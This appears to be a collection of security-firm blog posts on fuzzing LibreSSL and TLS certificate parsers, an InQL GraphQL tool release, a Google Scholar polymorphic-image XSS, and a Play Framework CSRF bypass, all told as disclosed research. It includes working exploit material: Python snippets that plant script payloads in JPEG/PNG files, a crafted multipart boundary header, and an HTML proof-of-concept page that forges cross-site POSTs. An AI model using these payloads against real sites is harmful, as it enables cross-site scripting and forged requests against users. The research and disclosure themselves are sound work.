Forking is considered a Bad Thing not merely because it implies a lot of wasted effort in the future, but because forks tend to be accompanied by a great deal of strife and acrimony between the successor groups over issues of legitimacy, succession, and design direction. There is serious social pressure against forking. As a result, major forks (such as the Gnu-Emacs/XEmacs split, the fissioning of the 386BSD group into three daughter projects, and the short-lived GCC/EGCS split) are rare enough that they are remembered individually in hacker folklore.

Eric Raymond Homesteading the Noosphere

The LibreSSL effort was generally well received and it now replaces OpenSSL on OpenBSD, on macOS since 10.11, and on many other Linux distributions. In the first few years, 6 critical vulnerabilities were found in OpenSSL and none of them affected LibreSSL.

Historically, these kinds of forks tend to spawn competing projects which cannot later exchange code, splitting the potential pool of developers between them. However, the LibreSSL team has largely demonstrated that it is able to merge and implement new OpenSSL code and bug fixes, all the while slimming down the original source code and cutting down on rarely used or dangerous features.

OSS-Fuzz Selection

While the development of LibreSSL appears to be a story with a happy ending, the integration of fuzzing and security auditing into the project was much less so. The Heartbleed vulnerability was a wakeup call to the industry for tackling the security of libraries that make up the core of the internet. In particular, Google opened up the OSS-Fuzz project. OSS-Fuzz is an effort to provide, for free, Google infrastructure to perform fuzzing against the most popular open source libraries. One of the first projects tested this way was in fact OpenSSL.

OSS-Fuzz Fuzzing Process

Fuzz testing is a well-known technique for uncovering programming errors in software. Many of these detectable errors, like buffer overflows, can have serious security implications. OpenSSL included fuzzers in c38bb72797916f2a0ab9906aad29162ca8d53546 and was integrated into OSS-Fuzz later in 2016.

commit c38bb72797916f2a0ab9906aad29162ca8d53546
Refs: OpenSSL_1_1_0-pre5-217-gc38bb72797
Author:     Ben Laurie <[email protected]>
AuthorDate: Sat Mar 26 17:19:14 2016 +0000
Commit:     Ben Laurie <[email protected]>
CommitDate: Sat May 7 18:13:54 2016 +0100
    Add fuzzing!

Since LibreSSL and OpenSSL share most of their codebase, with LibreSSL mainly implementing a secure subset of OpenSSL, we thought porting the OpenSSL fuzzers to LibreSSL would be a fun and useful project. Moreover, this resulted in the discovery of several memory corruption bugs.

Note that the following details won’t replace the official OSS-Fuzz guide, but they should help in selecting a good target project for an OSS-Fuzz integration. Generally speaking, applying for a new OSS-Fuzz integration proceeds in four logical steps:

  • Selection: Select a new project that isn’t yet ported. Check for existing projects in OSS-Fuzz projects directory. For example, check if somebody already tried to perform the same integration in a pull-request.
  • Feasibility: Check the feasibility and the security implications of that project on the Internet. As a general guideline, the more impact the project has on the everyday usage of the web the bigger the bounty will be. At the time of writing, OSS-Fuzz bounties are up to $20,000 with the Google patch-reward program. On the other hand, good coverage is expected to be developed for any integration. For this reason it is easier to integrate projects that already employ fuzzers.
  • Technical integration: Follow the super detailed getting started guide to perform an initial integration.
  • Profit: Apply for the Google patch-reward program. Profit?!

We were awarded a bounty, and we helped to protect the Internet just a little bit more. You should do it too!

Heartbreak

After a crash is found, the OSS-Fuzz infrastructure provides a minimized test case which can be inspected by an analyst. This issue was found in the ASN.1 parser. ASN.1 is a formal notation used for describing data transmitted by telecommunications protocols, regardless of language implementation and physical representation of the data, whether complex or very simple. Coincidentally, it is employed for X.509 certificates, which represent the technical basis for building public-key infrastructure.

Passing our test case 0202 ff25 through dumpasn1, it’s possible to see it error out, stating that the integer of length 2 (bytes) is encoded as a negative value. This is not allowed in ASN.1, and it should not be allowed in LibreSSL either. However, as discovered by OSS-Fuzz, this test case crashes the LibreSSL parser.

$ xxd ./test
00000000: 0202 ff25                                ...%
$ dumpasn1 ./test
  0   2: INTEGER 65317
       :   Error: Integer is encoded as a negative value.

0 warnings, 1 error.

Since the LibreSSL implementation was not guarded against negative integers, trying to convert the crafted negative ASN.1 integer to the internal BIGNUM representation causes an uncontrolled over-read.

AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==1==ERROR: AddressSanitizer: SEGV on unknown address 0x00009fff8000 (pc 0x00000058a308 bp 0x7ffd3e8b7bb0 sp 0x7ffd3e8b7b40 T0)
    ==1==The signal is caused by a READ memory access.
    SCARINESS: 20 (wild-addr-read)
        #0 0x58a307 in BN_bin2bn libressl/crypto/bn/bn_lib.c:601:19
        #1 0x6cd5ac in ASN1_INTEGER_to_BN libressl/crypto/asn1/a_int.c:456:13
        #2 0x6a39dd in i2s_ASN1_INTEGER libressl/crypto/x509v3/v3_utl.c:175:16
        #3 0x571827 in asn1_print_integer_ctx libressl/crypto/asn1/tasn_prn.c:457:6
        #4 0x571827 in asn1_primitive_print libressl/crypto/asn1/tasn_prn.c:556
        #5 0x571827 in asn1_item_print_ctx libressl/crypto/asn1/tasn_prn.c:239
        #6 0x57069a in ASN1_item_print libressl/crypto/asn1/tasn_prn.c:195:9
        #7 0x4f4db0 in FuzzerTestOneInput libressl.fuzzers/asn1.c:282:13
        #8 0x7fd3f5 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) /src/libfuzzer/FuzzerLoop.cpp:529:15
        #9 0x7bd746 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) /src/libfuzzer/FuzzerDriver.cpp:286:6
        #10 0x7c9273 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) /src/libfuzzer/FuzzerDriver.cpp:715:9
        #11 0x7bcdbc in main /src/libfuzzer/FuzzerMain.cpp:19:10
        #12 0x7fa873b8282f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/libc-start.c:291
        #13 0x41db18 in _start

This “wild” address read may be employed by malicious actors to perform leaks in security-sensitive contexts. The LibreSSL maintainers not only addressed the vulnerability promptly, but also included an additional protection to guard against missing ASN1_PRIMITIVE_FUNCS in 46e7ab1b335b012d6a1ce84e4d3a9eaa3a3355d9.

commit 46e7ab1b335b012d6a1ce84e4d3a9eaa3a3355d9
Author: jsing <>
Date:   Mon Apr 1 15:48:04 2019 +0000

    Require all ASN1_PRIMITIVE_FUNCS functions to be provided.

    If an ASN.1 item provides its own ASN1_PRIMITIVE_FUNCS functions, require
    all functions to be provided (currently excluding prim_clear). This avoids
    situations such as having a custom allocator that returns a specific struct
    but then is then printed using the default primative print functions, which
    interpret the memory as a different struct.

Closing the door to strangers

Fuzzing, despite being seen as one of the easiest ways to discover security vulnerabilities, still works very well. And even though OSS-Fuzz is especially tailored to open source projects, it can also be adapted to closed source projects: at the cost of implementing the LLVMFuzzerOneInput interface, it integrates all the latest and greatest clang/llvm fuzzing technology. Just as the Dockerfile language brought enormous improvements to the devops side, we strongly believe that the OSS-Fuzz fuzzing interface definition should be employed in every non-trivial closed source project too. If you need help, contact us for your security automation projects!

As always, this research was funded thanks to the 25% research time offered at Doyensec. Tune in again for new episodes!

Researching Polymorphic Images for XSS on Google Scholar

A few months ago I came across a curious design pattern on Google Scholar. Multiple screens of the web application were fetched and rendered using a combination of location.hash parameters and XHR to retrieve the supposed templating snippets from a relative URI, rendering them on the page unescaped.

Google Scholar's design pattern

This is not dangerous per se, unless the platform lets users upload arbitrary content and serve it from the same origin, which unfortunately Google Scholar does, given its image upload functionality.

While any penetration tester worth her salt would deem the exploitation of the issue trivial, Scholar’s image processing backend was applying different transformations to the uploaded images (i.e. stripping metadata and reprocessing the picture). When we reported the vulnerability, Google’s VRP team did not consider the upload of a polymorphic image carrying a valid XSS payload possible, and instead requested a PoC||GTFO.

Given the age of this technique, I first went through all the past “well-known” techniques for generating polymorphic pictures, and then developed a test suite to investigate the behavior of some of the most popular image processing libraries (i.e. ImageMagick, GraphicsMagick, libvips). This effort led to the discovery of some interesting caveats. Some of these methods can also be used to conceal web shells or JavaScript content to bypass “self” CSP directives.

Payload in EXIF

The easiest approach is to embed our payload in the metadata of the image. In the case of JPEG/JFIF, these pieces of metadata are stored in application-specific markers (called APPX), but they are not taken into account by the majority of image libraries. ExifTool is a popular tool to edit those entries, but you may find that in some cases the characters get entity-escaped, so I resorted to inserting them manually. In the hope of Google Scholar preserving some whitelisted EXIF tags, I created an image having 1.2k common EXIF tags, including CIPA standard and non-standard tags.
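As a sketch, the same kind of tampering can be scripted with the third-party piexif library (the field choice here is arbitrary):

import piexif

# plant the payload in a single EXIF field of an existing JPG
exif_bytes = piexif.dump({
    "0th": {piexif.ImageIFD.ImageDescription: b"<script>alert(1)</script>"}
})
piexif.insert(exif_bytes, "innocent.jpg", "exif_payload.jpg")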

JPG having the plain XSS alert() payload in every common metadata field PNG having the plain XSS alert() payload in every common metadata field

While that didn’t work in my case, some of the EXIF entries are to this day kept by many popular web platforms. In most of the image libraries tested, PNG metadata is always kept when converting from PNG to PNG, while it is always lost when converting from PNG to JPG.

Payload concatenated at the end of the image (after 0xFFD9 for JPGs or IEND for PNGs)

This technique will only work if no transformations are performed on the uploaded image, since only the image content is processed.

JPG having the plain XSS alert() payload after the trailing 0xFFD9 chunk PNG having the plain XSS alert() payload after the trailing IEND chunk

As the name suggests, the trick involves appending the JavaScript payload at the end of the image format.
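A minimal sketch of the JPEG variant:

payload = b"<script>alert(document.domain)</script>"
with open("innocent.jpg", "rb") as f:
    data = f.read()
end = data.rfind(b"\xff\xd9") + 2      # keep everything up to and including EOI
with open("polyglot.jpg", "wb") as f:
    f.write(data[:end] + payload)      # bytes after EOI are ignored by viewers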

Payload in PNG’s IDAT

In PNGs, the IDAT chunk stores the pixel information. Depending on the transformations applied, you may be able to directly insert your raw payload in the IDAT chunks, or you may try to bypass the resize and re-sampling operations. Google Scholar only generated JPG pictures, so I could not leverage this technique.

Payload in JPG’s ECS

In the JFIF standard, the entropy-coded data segment (ECS) contains the output of the raw Huffman-compressed bitstream which represents the Minimum Coded Unit (MCU) that comprises the image data. In theory, it is possible to position our payload in this segment, but there are no guarantees that our payload will survive the transformation applied by the image library on the server. Creating a JPG image resistant to the transformations caused by the library was a process of trial and error.

As a starting point, I crafted a “base” image with the same quality factors as the images resulting from the conversion. For this I ended up using this image having 0-length-string EXIFs. Even though positioning the payload at a variable offset from the beginning of the section did not work, I found that when processed by Google Scholar the first bytes of the image’s ECS section were kept if separated by a pattern of 0x00 and 0x14 bytes.

Hexadecimal view of the JFIF structure, with the payload visible in the ECS section

From here it took me a little time to find the right sequence of bytes allowing the payload to survive the transformation, since the majority of user agents did not tolerate low-value bytes in the script tag definition of the page. For anyone interested, we have made available the images embedding the onclick and mouseover events. Our image library test suite is available on Github as doyensec/StandardizedImageProcessingTest.

Exploitation result of the XSS PoC on Scholar

Timeline

  • [2019-09-28] Reported to Google VRP
  • [2019-09-30] Google’s VRP requested a PoC
  • [2019-10-04] Provided PoC #1
  • [2019-10-10] Google’s VRP requested a different payload for PoC
  • [2019-10-11] Provided PoC #2
  • [2019-11-05] Google’s VRP confirmed the issue in 2 endpoints, rewarded $6267.40
  • [2019-11-19] Google’s VRP found another XSS using the same technique, rewarded an additional $3133.70

Fuzzing TLS certificates from their ASN.1 grammar

A good part of my research time at Doyensec was devoted to building a flexible ASN.1 grammar-based fuzzer for testing TLS certificate parsers. I learned a lot in the process, but I often struggled to find good resources on these topics. In this blogpost I want to give a high-level overview of the problem, the approach I’m taking, and some pointers which might hopefully save a little time for other fellow security researchers.

Let’s start with some basics.

What is a TLS certificate?

A TLS certificate is a DER-encoded object conforming to the ASN.1 grammar and constraints defined in RFC 5280, which is based on the ITU X.509 standard.

That’s a lot of information to unpack, let’s take it one piece at a time.

ASN.1

ASN.1 (Abstract Syntax Notation One) is a grammar used to define abstract objects. You can think of it as a much older and more complicated version of Protocol Buffers. ASN.1 however does not define an encoding, which is left to other standards. This language was designed by ITU and it is extremely powerful and general purpose.

This is how a message in a chat protocol might be defined:

Message ::= SEQUENCE {
    senderId     INTEGER,
    recipientId  INTEGER,
    message      UTF8String,
    sendTime     GeneralizedTime,
    ...
}

At first sight, ASN.1 might even seem quite simple and intuitive. But don't be fooled! ASN.1 contains a lot of vestigial and complex features. For a start, it has ~13 string types. Constraints can be placed on fields; for instance, integer values and string sizes can be restricted to an acceptable range.

The real complexity beasts, however, are information objects, parametrization and tabular constraints. Information objects allow the definition of templates for data types, along with a grammar to declare instances of that template (oh yeah…defining a grammar within a grammar!).

This is how a template for different message types could be defined:

-- Definition of the MESSAGE-CLASS information object class
MESSAGE-CLASS ::= CLASS {
    &messageTypeId INTEGER UNIQUE,
    &payload      [1] OPTIONAL,
    ...
}
WITH SYNTAX {
    MESSAGE-TYPE-ID  &messageTypeId
    [PAYLOAD    &payload]
}

-- Definition of some message types
TextMessageKinds MESSAGE-CLASS ::= {
    -- Text message
    {MESSAGE-TYPE-ID 0, PAYLOAD UTF8String}
    -- Read ACK (no payload)
  | {MESSAGE-TYPE-ID 1, PAYLOAD SEQUENCE { toMessageId INTEGER } }
}

MediaMessageKinds MESSAGE-CLASS ::= {
    -- JPEG
    {MESSAGE-TYPE-ID 2, PAYLOAD OCTET STRING}
}

Parametrization allows the introduction of parameters in the specification of a type:

Message {MESSAGE-CLASS : MessageClass} ::= SEQUENCE {
    messageId     INTEGER,
    senderId      INTEGER,
    recipientId   INTEGER,
    sendTime      GeneralizedTime,
    messageTypeId MESSAGE-CLASS.&messageTypeId ({MessageClass}),
    payload       MESSAGE-CLASS.&payload ({MessageClass} {@messageTypeId})
}

While a complete overview of the format is not within the scope of this post, a very good entry-level, but quite comprehensive, resource I found is this ASN1 Survival guide. The nitty-gritty details can be found in the ITU standards X.680 to X.683.

Powerful as it may be, ASN.1 suffers from a large practical problem - it lacks a wide choice of compilers (parser generators), especially non-commercial ones. Most of them do not implement advanced features like information objects. This means that, more often than not, data structures defined using ASN.1 are serialized and deserialized by handcrafted code instead of an autogenerated parser. This is also true for many libraries handling TLS certificates.

DER

DER (Distinguished Encoding Rules) is an encoding used to translate an ASN.1 object into bytes. It is a simple Tag-Length-Value format: each element is encoded as its type (tag), followed by the length of the payload, followed by the payload itself. Its rules ensure there is only one valid representation for any given object, a useful property when dealing with digital certificates that must be signed and checked for anomalies.

The details of how DER works are not relevant to this post. A good place to start is here.
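
To make the Tag-Length-Value idea concrete, here is a minimal sketch of a DER encoder for INTEGERs and SEQUENCEs (short-form lengths only, so payloads under 128 bytes; the 0x02 and 0x30 tags come from X.690):

# Minimal DER sketch: Tag-Length-Value with short-form lengths only
def der_tlv(tag: int, payload: bytes) -> bytes:
    assert len(payload) < 0x80, 'long-form lengths not handled here'
    return bytes([tag, len(payload)]) + payload

def der_integer(value: int) -> bytes:
    # Minimal-length big-endian two's complement, tag 0x02
    length = max(1, (value.bit_length() + 8) // 8)
    return der_tlv(0x02, value.to_bytes(length, 'big', signed=True))

def der_sequence(*members: bytes) -> bytes:
    # Members are concatenated and wrapped with tag 0x30
    return der_tlv(0x30, b''.join(members))

# SEQUENCE { INTEGER 1, INTEGER 65537 } -> 30080201010203010001
print(der_sequence(der_integer(1), der_integer(65537)).hex())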

RFC 5280 and X.509

The format of the digital certificates used in TLS is defined in some RFCs, most importantly RFC 5280 (and then in RFC 5912, updated for ASN.1 2002). The specification is based on the ITU X.509 standard.

This is what the outermost layer of a TLS certificate contains:

Certificate  ::=  SEQUENCE  {
    tbsCertificate       TBSCertificate,
    signatureAlgorithm   AlgorithmIdentifier,
    signature            BIT STRING  
}

TBSCertificate  ::=  SEQUENCE  {
    version         [0]  Version DEFAULT v1,
    serialNumber         CertificateSerialNumber,
    signature            AlgorithmIdentifier,
    issuer               Name,
    validity             Validity,
    subject              Name,
    subjectPublicKeyInfo SubjectPublicKeyInfo,
    issuerUniqueID  [1]  IMPLICIT UniqueIdentifier OPTIONAL,
                         -- If present, version MUST be v2 or v3
    subjectUniqueID [2]  IMPLICIT UniqueIdentifier OPTIONAL,
                         -- If present, version MUST be v2 or v3
    extensions      [3]  Extensions OPTIONAL
                         -- If present, version MUST be v3 --
}

You may recognize some of these fields from inspecting a certificate with a browser's integrated viewer.

Doyensec X509 certificate
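
The same fields can also be dumped programmatically. A short sketch, assuming a recent version of the pyca/cryptography library and a PEM-encoded certificate on disk (the file name is illustrative):

# Hedged sketch: print some TBSCertificate fields using pyca/cryptography
from cryptography import x509

with open('doyensec.pem', 'rb') as f:
    cert = x509.load_pem_x509_certificate(f.read())

print('version:     ', cert.version)
print('serialNumber:', hex(cert.serial_number))
print('issuer:      ', cert.issuer.rfc4514_string())
print('validity:    ', cert.not_valid_before, '->', cert.not_valid_after)
print('subject:     ', cert.subject.rfc4514_string())
for ext in cert.extensions:
    print('extension:   ', ext.oid, 'critical =', ext.critical)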

Finding out what exactly should go inside a TLS certificate and how it should be interpreted was not an easy task - the specifications are scattered across many RFCs and other standards, sometimes with partial or even conflicting information. Some documents from the recent past offer a good insight into the number of contradictory interpretations. Nowadays there seems to be more convergence, and a good place to start when looking at how a TLS certificate should be handled is the RFCs together with a couple of widely used TLS libraries.

Fuzzing TLS starting from ASN.1

Previous work

All the high-profile TLS libraries include some fuzzing harnesses directly in their source tree, and most are even continuously fuzzed (like LibreSSL, which is now included in oss-fuzz thanks to my colleague Andrea). Most libraries use tried-and-tested fuzzers like AFL or libFuzzer, which are not encoding or syntax aware. This very likely means that many cycles are wasted generating and testing inputs which are rejected early by the parsers.

X.509 parsers have been fuzzed using many approaches. Frankencert, for instance, generates certificates by combining parts from existing ones, while CertificateFuzzer uses a hand-coded grammar. Some fuzzing efforts are more targeted towards discovering memory-corruption types of bugs, while others are more geared towards discovering logic bugs, often comparing the behavior of multiple parsers side by side to detect inconsistencies.

ASN1Fuzz

I wanted a tool capable of generating valid inputs from an ASN.1 grammar, so that I could slightly break them and hopefully find some vulnerabilities. I couldn't find any tool accepting ASN.1 grammars, so I decided to build one myself.

After a lot of experimentation and three full rewrites, I have a pipeline that generates valid X509 certificates. It looks like this:

     +-------+
     | ASN.1 |
     +---+---+
         |
      pycrate
         |
 +-------v--------+        +--------------+
 | Python classes |        |  User Hooks  |
 +-------+--------+        +-------+------+
         |                         |
         +-----------+-------------+
                     |
                 Generator
                     |
                     |
                 +---v---+
                 |       |
                 |  AST  |
                 |       |
                 +---+---+
                     |
                  Encoder
                     |
               +-----v------+
               |            |
               |   Output   |
               |            |
               +------------+

First, I compile the ASN.1 grammar using pycrate, one of the few FOSS compilers that support most of the advanced features of ASN.1.

The output of the compiler is fed into the Generator. With a lot of introspection into the pycrate classes, this component generates random ASTs conforming to the input grammar. The ASTs can then be fed to an encoder (e.g. DER) to create a binary output suitable for testing the target application.

Certificates produced like this would not be valid, because many constraints are not encoded in the syntax. Moreover, I wanted to give the user total freedom to manipulate the generator's behavior. To solve this problem, I developed a handy hooking system which allows overrides at any point in the generator:

import random
import time

from pycrate_asn1dir.X509_2016 import AuthenticationFramework
from generator import Generator

spec = AuthenticationFramework.Certificate
cert_generator = Generator(spec)

@cert_generator.value_hook("Certificate/toBeSigned/validity/notBefore/.*")
def generate_notBefore(generator: Generator, node):
    now = int(time.time())
    start = now - 10 * 365 * 24 * 60 * 60  # 10 years ago
    return random.randint(start, now)

@cert_generator.node_hook("Certificate/toBeSigned/extensions/_item_[^/]*/" \
                          "extnValue/ExtnType/_cont_ExtnType/keyIdentifier")
def force_akid_generation(generator: Generator, node):
    # keyIdentifier should be present unless the certificate is self-signed
    return generator.generate_node(node, ignore_hooks=True)

@cert_generator.value_hook("Certificate/signature")
def generate_signature(generator: Generator, node):
    # (... compute signature ...)
    return (sig, siglen)

The AST generated by this pipeline can already be used for differential testing. For instance, if one library accepts the certificate while others don't, there may be a problem that requires manual investigation.
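
A sketch of that idea, using pyca/cryptography and the openssl command-line tool as the two parsers under comparison (generated.der stands in for whatever the pipeline emitted):

# Hedged differential-testing sketch: flag parser disagreements
import subprocess
from cryptography import x509

with open('generated.der', 'rb') as f:
    der = f.read()

def accepts_pyca(data: bytes) -> bool:
    try:
        x509.load_der_x509_certificate(data)
        return True
    except Exception:
        return False

def accepts_openssl(data: bytes) -> bool:
    proc = subprocess.run(['openssl', 'x509', '-inform', 'DER', '-noout'],
                          input=data, capture_output=True)
    return proc.returncode == 0

if accepts_pyca(der) != accepts_openssl(der):
    print('parsers disagree -> manual investigation needed')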

In addition, the ASTs can be mutated using a custom mutator for AFL++, which performs random operations on the tree.
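
For reference, AFL++ custom mutators can be written in Python by exposing the init() and fuzz() entry points described in AFL++'s custom mutator documentation. The sketch below only illustrates the idea: the pickle-based AST format and the toy tree operations are assumptions, not ASN1Fuzz's actual mutator.

# Toy AFL++ Python custom mutator operating on a (hypothetical) pickled AST
import pickle
import random

def init(seed):
    random.seed(seed)

def fuzz(buf, add_buf, max_size):
    try:
        tree = pickle.loads(bytes(buf))        # hypothetical serialization
    except Exception:
        return bytearray(buf)                  # not a tree: pass through
    nodes = tree.setdefault('children', [])    # assume dict-based nodes
    op = random.choice(('dup', 'drop', 'swap'))
    if op == 'dup' and nodes:
        nodes.append(random.choice(nodes))     # duplicate a random subtree
    elif op == 'drop' and nodes:
        nodes.pop(random.randrange(len(nodes)))
    elif op == 'swap' and len(nodes) >= 2:
        i, j = random.sample(range(len(nodes)), 2)
        nodes[i], nodes[j] = nodes[j], nodes[i]
    out = pickle.dumps(tree)
    return bytearray(out) if len(out) <= max_size else bytearray(buf)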

ASN1Fuzz is currently research-quality code, but I aim to open source it at some point in the future. Since the generation starts from ASN.1 grammars, the tool is not limited to generating TLS certificates, and it could be leveraged to fuzz a plethora of other protocols.

Stay tuned for the next blog post where I will present the results from this research!

InQL Scanner v2 is out!

InQL dyno-mites release

After the public launch of InQL we received an overwhelming response from the community. We’re excited to announce a new major release available on Github. In this version (codenamed dyno-mites), we have introduced a few cool features and a new logo!

InQL Logo

Jython Standalone GUI

As you might know, InQL can be used as a stand-alone tool, or as a Burp Suite extension (available for both Professional and Community editions). Using GraphQL's built-in introspection query, the tool collects queries, mutations, subscriptions, fields, arguments, etc., to automatically generate query templates that can be used for QA / security testing.
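
For context, this is the kind of introspection request InQL builds on, sketched with Python's requests library (the endpoint and authorization header are placeholders):

# Minimal GraphQL introspection probe; endpoint and token are placeholders
import requests

INTROSPECTION = '''
query {
  __schema {
    queryType { name }
    mutationType { name }
    types { name kind }
  }
}
'''

resp = requests.post('https://target.example/graphql',
                     json={'query': INTROSPECTION},
                     headers={'Authorization': 'Bearer <token>'})
for t in resp.json()['data']['__schema']['types']:
    print(t['kind'], t['name'])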

In this release, we introduced a Jython standalone GUI similar to the Burp one:

$ brew install jython
$ jython -m pip install inql
$ jython -m inql

Advanced Query Editor

Many users have asked for syntax highlighting and code completion. Et Voila!

InQL GraphiQL

InQL v2 includes an embedded GraphiQL server. This server works as a proxy and handles all the requests, enhancing them with authorization headers. The GraphiQL server improves the overall InQL experience by providing an advanced query editor with autocompletion and other useful features. We also introduced stubbing of introspection queries when introspection is not available.

We imagine people working across GraphiQL, InQL and other Burp Suite tools, hence we included custom "Send to GraphiQL" / "Send to Repeater" flows to move queries back and forth between the tools.

InQL v2 Flow

Tabbed Editor with Multi-Query and Variables support

But that’s not all. On the Burp Suite extension side, InQL is now handling batched-queries and searching inside queries.

InQL v2 Editor

This was made possible by re-engineering the editor in use (i.e. the default Burp text editor) and including a new tabbed interface able to sync between multiple representations of these queries.

BApp Store

Finally, InQL is now available on Burp Suite's BApp Store, so you can easily install the extension from within Burp's extension tab.

Stay tuned!

In just three months, InQL has become the go-to utility for GraphQL security testing. We received a lot of positive feedback and decided to double down on the development. We will keep improving the tool based on users’ feedback and the experience we gain through our GraphQL security testing services.

This project was crafted with love in the Doyensec Research Island.

CSRF Protection Bypass in Play Framework

This blog post illustrates a vulnerability affecting the Play framework that we discovered during a client engagement. This issue allows a complete Cross-Site Request Forgery (CSRF) protection bypass under specific configurations.

In their own words, the Play Framework is a high velocity web framework for Java and Scala. It is built on Akka, a toolkit for building highly concurrent, distributed, and resilient message-driven applications for Java and Scala.

Play is a widely used framework and is deployed on web platforms for both large and small organizations, such as Verizon, Walmart, The Guardian, LinkedIn, Samsung and many others.

Old school anti-CSRF mechanism

In older versions of the framework, CSRF protection was provided by an insecure baseline mechanism that applied even when CSRF tokens were not present in the HTTP requests.

This mechanism was based on the differences between Simple Requests and Preflighted Requests. Let's explore the details.

A Simple Request has a strict ruleset. Whenever these rules are followed, the user agent (e.g. a browser) won't issue an OPTIONS preflight, even when the request is made through XMLHttpRequest. All rules and details can be found on this Mozilla Developer page, although we are primarily interested in the Content-Type ruleset.

The Content-Type header for simple requests can contain one of three values:

  • application/x-www-form-urlencoded
  • multipart/form-data
  • text/plain

If you specify a different Content-Type, such as application/json, the browser will send an OPTIONS request to verify that the web server allows such a request.

Now that we understand the differences between preflighted and simple requests, we can continue onwards to understand how Play used to protect against CSRF attacks.

In older versions of the framework (up to and including version 2.5), a blacklist of received Content-Type headers was used as the CSRF prevention mechanism.

In the 2.8.x migration guide, we can see how users could restore Play’s old default behavior if required by legacy systems or other dependencies:

application.conf

play.filters.csrf {
  header {
    bypassHeaders {
      X-Requested-With = "*"
      Csrf-Token = "nocheck"
    }
    protectHeaders = null
  }
  bypassCorsTrustedOrigins = false
  method {
    whiteList = []
    blackList = ["POST"]
  }
  contentType.blackList = ["application/x-www-form-urlencoded", "multipart/form-data", "text/plain"]
}

In the snippet above we can see the core of the old protection. The contentType.blackList setting contains three values, which are identical to the content types allowed in "simple requests". This was considered a valid (although not ideal) protection, since the following scenarios are prevented:

  • attacker.com embeds a <form> element which posts to victim.com
    • Form allows form-urlencoded, multipart or plain, which are all blocked by the mechanism
  • attacker.com uses XHR to POST to victim.com with application/json
    • Since application/json is not a “simple request”, an OPTIONS will be sent and (assuming a proper configuration) CORS will block the request
  • victim.com uses XHR to POST to victim.com with application/json
    • This works as it should, since the request is not cross-site but within the same domain

Hence, you now have CSRF protection. Or do you?

Looking for a bypass

Armed with this knowledge, the first thing that comes to mind is that we need to make the browser issue a request that does not trigger a preflight and that does not match any values in the contentType.blackList setting.

The first thing we did was map out requests that we could modify without triggering an OPTIONS preflight. This came down to a single content type: Content-Type: multipart/form-data

This immediately looked interesting thanks to the boundary directive: Content-Type: multipart/form-data; boundary=something

The description can be found here:

For multipart entities the boundary directive is required, which consists of 1 to 70 characters from a set of characters known to be very robust through email gateways, and not ending with white space. It is used to encapsulate the boundaries of the multiple parts of the message. Often, the header boundary is prepended with two dashes and the final boundary has two dashes appended at the end.

So, we have a field that can actually be modified with plenty of different characters and it is all attacker-controlled.

Now we need to dig deep into the parsing of these headers. In order to do that, we need to take a look at Akka HTTP which is what the Play framework is based on.

Looking at HttpHeaderParser.scala, we can see that these headers are always parsed:

private val alwaysParsedHeaders = Set[String](
    "connection",
    "content-encoding",
    "content-length",
    "content-type",
    "expect",
    "host",
    "sec-websocket-key",
    "sec-websocket-protocol",
    "sec-websocket-version",
    "transfer-encoding",
    "upgrade"
)

And the parsing rules can be seen in HeaderParser.scala which follows RFC 7230 Hypertext Transfer Protocol (HTTP/1.1): Message Syntax and Routing, June 2014.

def `header-field-value`: Rule1[String] = rule {
  FWS ~ clearSB() ~ `field-value` ~ FWS ~ EOI ~ push(sb.toString)
}

def `field-value` = {
  var fwsStart = cursor
  rule {
    zeroOrMore(`field-value-chunk`).separatedBy { // zeroOrMore because we need to also accept empty values
      run { fwsStart = cursor } ~ FWS ~ &(`field-value-char`) ~ run { if (cursor > fwsStart) sb.append(' ') }
    }
  }
}

def `field-value-chunk` = rule { oneOrMore(`field-value-char` ~ appendSB()) }

def `field-value-char` = rule { VCHAR | `obs-text` }

def FWS = rule { zeroOrMore(WSP) ~ zeroOrMore(`obs-fold`) }

def `obs-fold` = rule { CRLF ~ oneOrMore(WSP) }

If these parsing rules are not obeyed, the header value will be set to None. Perfect! That is exactly what we need to bypass the CSRF protection - a "simple request" whose Content-Type is parsed to None, thus evading the blacklist.

How do we actually forge a request that is allowed by the browser, but is considered invalid by the Akka HTTP parsing code?

We decided to let fuzzing answer that, and quickly discovered that the following transformation worked: Content-Type: multipart/form-data; boundary=--some;randomboundaryvalue
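
The server-side half of that fuzzing loop can be sketched in a few lines of Python (the candidate list, endpoint and success heuristic are illustrative; the browser-side "no preflight" constraint still has to be verified separately):

# Probe boundary values against a CSRF-protected Play endpoint and note
# which ones slip past the Content-Type blacklist (illustrative sketch)
import requests

CANDIDATES = ['--a;b', '--a b', '--a"b', '--a,b', '--a(b)']

for boundary in CANDIDATES:
    ctype = 'multipart/form-data; boundary=' + boundary
    resp = requests.post('http://play.local:9000/count',
                         headers={'Content-Type': ctype}, data=b'')
    # A 200 suggests Akka parsed the header to None, bypassing the filter
    print(resp.status_code, repr(ctype))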

An extra semicolon inside the boundary value would do the trick and mark the request as illegal:

POST /count HTTP/1.1
Host: play.local:9000
...
Content-Type: multipart/form-data;boundary=------;---------------------139501139415121
Content-Length: 0

Response:

HTTP/1.1 200 OK
...
Content-Type: text/plain; charset=UTF-8
Content-Length: 1

5

This is also confirmed by looking at the logs of the server in development mode:

a.a.ActorSystemImpl - Illegal header: Illegal 'content-type' header: Invalid input 'EOI', expected tchar, OWS or ws (line 1, column 74): multipart/form-data;boundary=------;---------------------139501139415121

And by instrumenting the Play framework code to print the value of the Content-Type:

Content-Type: None

Finally, we built the following proof-of-concept and notified our client (along with the Play framework maintainers):

<html>
    <body>
        <h1>Play Framework CSRF bypass</h1>
        <button type="button" onclick="poc()">PWN</button>
        <p id="demo"></p>
        <script>
        function poc() {
            var xhttp = new XMLHttpRequest();
            xhttp.onreadystatechange = function() {
                if (this.readyState == 4 && this.status == 200) {
                    document.getElementById("demo").innerHTML = this.responseText;
                }
            };
            xhttp.open("POST", "http://play.local:9000/count", true);
            xhttp.setRequestHeader(
                "Content-type",
                "multipart/form-data; boundary=------;---------------------139501139415121"
            );
            xhttp.withCredentials = true;
            xhttp.send("");
        }
        </script>
    </body>
</html>

Credits & Disclosure

This vulnerability was discovered by Kevin Joensen and reported to the Play framework via [email protected] on April 24, 2020. The issue was fixed in Play 2.8.2 and 2.7.5. CVE-2020-12480 was assigned, and all details were published by the vendor on August 10, 2020. Thanks to James Roper of Lightbend for the assistance.

